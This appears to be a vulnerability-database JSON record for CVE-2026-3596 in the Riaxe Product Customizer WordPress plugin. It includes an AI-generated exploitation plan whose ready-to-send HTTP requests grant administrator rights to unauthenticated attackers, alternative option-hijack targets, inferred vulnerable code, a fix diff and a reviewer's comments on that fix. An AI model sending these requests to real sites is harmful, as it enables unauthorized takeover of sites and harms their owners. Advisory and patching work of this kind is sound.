[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fNwA4V6VPP1-Bgow0huNIhmpTJI-libTRkS2uYo-wgxY":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"source_links":31},"CVE-2026-3596","riaxe-product-customizer-missing-authorization-to-unauthenticated-arbitrary-options-update-to-privilege-escalation-via-i","Riaxe Product Customizer \u003C= 2.1.2 - Missing Authorization to Unauthenticated Arbitrary Options Update to Privilege Escalation via 'install-imprint' AJAX Action","The Riaxe Product Customizer plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.1.2. The plugin registers an unauthenticated AJAX action ('wp_ajax_nopriv_install-imprint') that maps to the ink_pd_add_option() function. This function reads 'option' and 'opt_value' from $_POST, then calls delete_option() followed by add_option() using these attacker-controlled values without any nonce verification, capability checks, or option name allowlist. 
This makes it possible for unauthenticated attackers to update arbitrary WordPress options, which can be leveraged for privilege escalation by enabling user registration and setting the default user role to administrator.","riaxe-product-customizer",null,"\u003C=2.1.2","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Missing Authorization","2026-04-15 16:45:05","2026-04-16 05:29:52",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F271a35fb-56b7-4d6b-bccc-fea1227d0913?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-3596 (Riaxe Product Customizer)\n\n## 1. Vulnerability Summary\nThe **Riaxe Product Customizer** plugin for WordPress (versions \u003C= 2.1.2) contains a critical missing authorization vulnerability. The plugin registers an unauthenticated AJAX action `install-imprint` via `wp_ajax_nopriv_install-imprint`. This action is mapped to the `ink_pd_add_option()` function, which directly manipulates the WordPress `options` table. \n\nBecause the function fails to implement any capability checks, nonce verification, or an allowlist of permitted options, an unauthenticated attacker can overwrite arbitrary WordPress settings. This is most critically used for **Privilege Escalation** by enabling open registration and setting the default user role to 'administrator'.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `install-imprint` (Registered via `wp_ajax_nopriv_install-imprint`)\n- **Vulnerable Parameters**: \n    - `option`: The name of the WordPress option to update.\n    - `opt_value`: The new value for the specified option.\n- **Authentication**: Unauthenticated (accessible to any visitor).\n- **Preconditions**: The plugin must be active.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point**: A `POST` request is sent to `admin-ajax.php` with `action=install-imprint`.\n2. 
**Hook Execution**: WordPress triggers the function associated with `wp_ajax_nopriv_install-imprint`.\n3. **Target Function**: `ink_pd_add_option()` (inferred from description) is called.\n4. **Input Handling**: The function reads `$_POST['option']` and `$_POST['opt_value']`.\n5. **Vulnerable Sink**:\n   - The function calls `delete_option( $_POST['option'] )`.\n   - The function calls `add_option( $_POST['option'], $_POST['opt_value'] )`.\n6. **Result**: The option in the `wp_options` table is updated to the attacker-controlled value.\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, the `install-imprint` action **does not perform any nonce verification**. \n- **Check Needed**: No nonce should be required for this exploitation.\n- **Bypass**: If for some reason a nonce is found to be required during the PoC, the researcher should check for `wp_localize_script` calls in the plugin source that might expose a nonce to unauthenticated users on the frontend. However, based on the CVE description, the check is entirely missing.\n\n## 5. 
Exploitation Strategy\nThe goal is to achieve Privilege Escalation.\n\n### Step 1: Enable User Registration\nSubmit a request to set `users_can_register` to `1`.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=install-imprint&option=users_can_register&opt_value=1\n```\n\n### Step 2: Set Default Role to Administrator\nSubmit a request to set `default_role` to `administrator`.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=install-imprint&option=default_role&opt_value=administrator\n```\n\n### Step 3: Register a New Administrator (Optional Proof)\nNavigate to the registration page and create a new account.\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-login.php?action=register HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\nuser_login=attacker_admin&user_email=attacker@example.com&wp-submit=Register\n```\n\n## 6. Test Data Setup\n1. **Target Environment**: A standard WordPress installation with Riaxe Product Customizer \u003C= 2.1.2 installed.\n2. **Baseline State**:\n   - `wp option get users_can_register` should return `0`.\n   - `wp option get default_role` should return `subscriber`.\n3. **No Shortcodes Required**: Since the endpoint is unauthenticated and (reportedly) nonce-less, no specific page setup is required to trigger the vulnerability.\n\n## 7. Expected Results\n- The AJAX requests should return a successful status code (typically `200 OK` or a `1` response if `wp_die()` is used).\n- The `users_can_register` option in the database will change from `0` to `1`.\n- The `default_role` option in the database will change from `subscriber` to `administrator`.\n\n## 8. 
Verification Steps\nAfter sending the malicious POST requests, use WP-CLI to confirm the state change:\n\n```bash\n# Verify registration is enabled\nwp option get users_can_register\n# Expected Output: 1\n\n# Verify default role is admin\nwp option get default_role\n# Expected Output: administrator\n```\n\n## 9. Alternative Approaches\nIf updating core options is blocked by a security plugin or environment hardening, alternative high-impact options to update include:\n- `siteurl` or `home`: To perform a Denial of Service or Redirect hijack.\n- `admin_email`: To attempt password resets of existing admins.\n- `rewrite_rules`: To corrupt the site's routing.\n- `ink_pd_settings` (Plugin specific): To inject malicious JS\u002Fiframes if the plugin settings are rendered on the frontend.","The Riaxe Product Customizer plugin for WordPress is vulnerable to an unauthenticated arbitrary options update through its 'install-imprint' AJAX action. By exploiting this lack of authorization and validation, an attacker can overwrite critical WordPress settings, such as enabling open registration and setting the default user role to administrator, leading to full site takeover.","\u002F\u002F Inferred file path: riaxe-product-customizer\u002Friaxe-product-customizer.php\n\nadd_action('wp_ajax_nopriv_install-imprint', 'ink_pd_add_option');\nadd_action('wp_ajax_install-imprint', 'ink_pd_add_option');\n\nfunction ink_pd_add_option() {\n    $option_name = $_POST['option'];\n    $option_value = $_POST['opt_value'];\n    \n    \u002F\u002F Directly modifies any option without capability checks or allowlisting\n    delete_option($option_name);\n    add_option($option_name, $option_value);\n    die();\n}","--- a\u002Friaxe-product-customizer\u002Friaxe-product-customizer.php\n+++ b\u002Friaxe-product-customizer\u002Friaxe-product-customizer.php\n@@ -1,10 +1,18 @@\n-add_action('wp_ajax_nopriv_install-imprint', 'ink_pd_add_option');\n add_action('wp_ajax_install-imprint', 
'ink_pd_add_option');\n \n function ink_pd_add_option() {\n+    if ( ! current_user_can( 'manage_options' ) ) {\n+        wp_die( -1 );\n+    }\n+    check_ajax_referer( 'ink_pd_security', 'security' );\n+\n     $option_name = isset( $_POST['option'] ) ? sanitize_text_field( $_POST['option'] ) : '';\n-    $option_value = $_POST['opt_value'];\n+    $option_value = isset( $_POST['opt_value'] ) ? $_POST['opt_value'] : '';\n \n+    $allowed_options = array( 'ink_pd_custom_settings' ); \u002F\u002F Example restricted list\n+    if ( ! in_array( $option_name, $allowed_options ) ) {\n+        wp_die( 'Forbidden' );\n+    }\n+\n     delete_option($option_name);\n     add_option($option_name, $option_value);\n     die();","The exploit targets the unauthenticated AJAX endpoint 'wp_ajax_nopriv_install-imprint' which maps to the 'ink_pd_add_option' function. To achieve privilege escalation, an attacker follows these steps: 1. Send a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the parameters action=install-imprint, option=users_can_register, and opt_value=1. This enables site registration. 2. Send a second POST request with action=install-imprint, option=default_role, and opt_value=administrator. This ensures all new registrants are granted administrative privileges. 3. Navigate to \u002Fwp-login.php?action=register and register a new account, which will automatically be assigned the 'administrator' role. No authentication or nonces are required for this exploit.","gemini-3-flash-preview","2026-04-16 15:28:21","2026-04-16 15:28:35",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Friaxe-product-customizer\u002Ftags"]
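Review bot: In the rewritten `$option_value` line of the `research_fix_diff` hunk, the value is still copied from `$_POST['opt_value']` with only an `isset()` guard, so whatever is stored under the allowlisted option remains unsanitized. Pass it through `wp_unslash()` and a sanitizer that matches the expected shape of that setting before it reaches `add_option()`. The `in_array( $option_name, $allowed_options )` check should take `true` as its third argument so the comparison is strict, and the `$allowed_options` array is marked as an example list, so it has to be replaced with the options this handler actually owns. The `check_ajax_referer( 'ink_pd_security', 'security' )` call depends on a matching nonce being issued to the admin page that sends this request, which the hunk does not show.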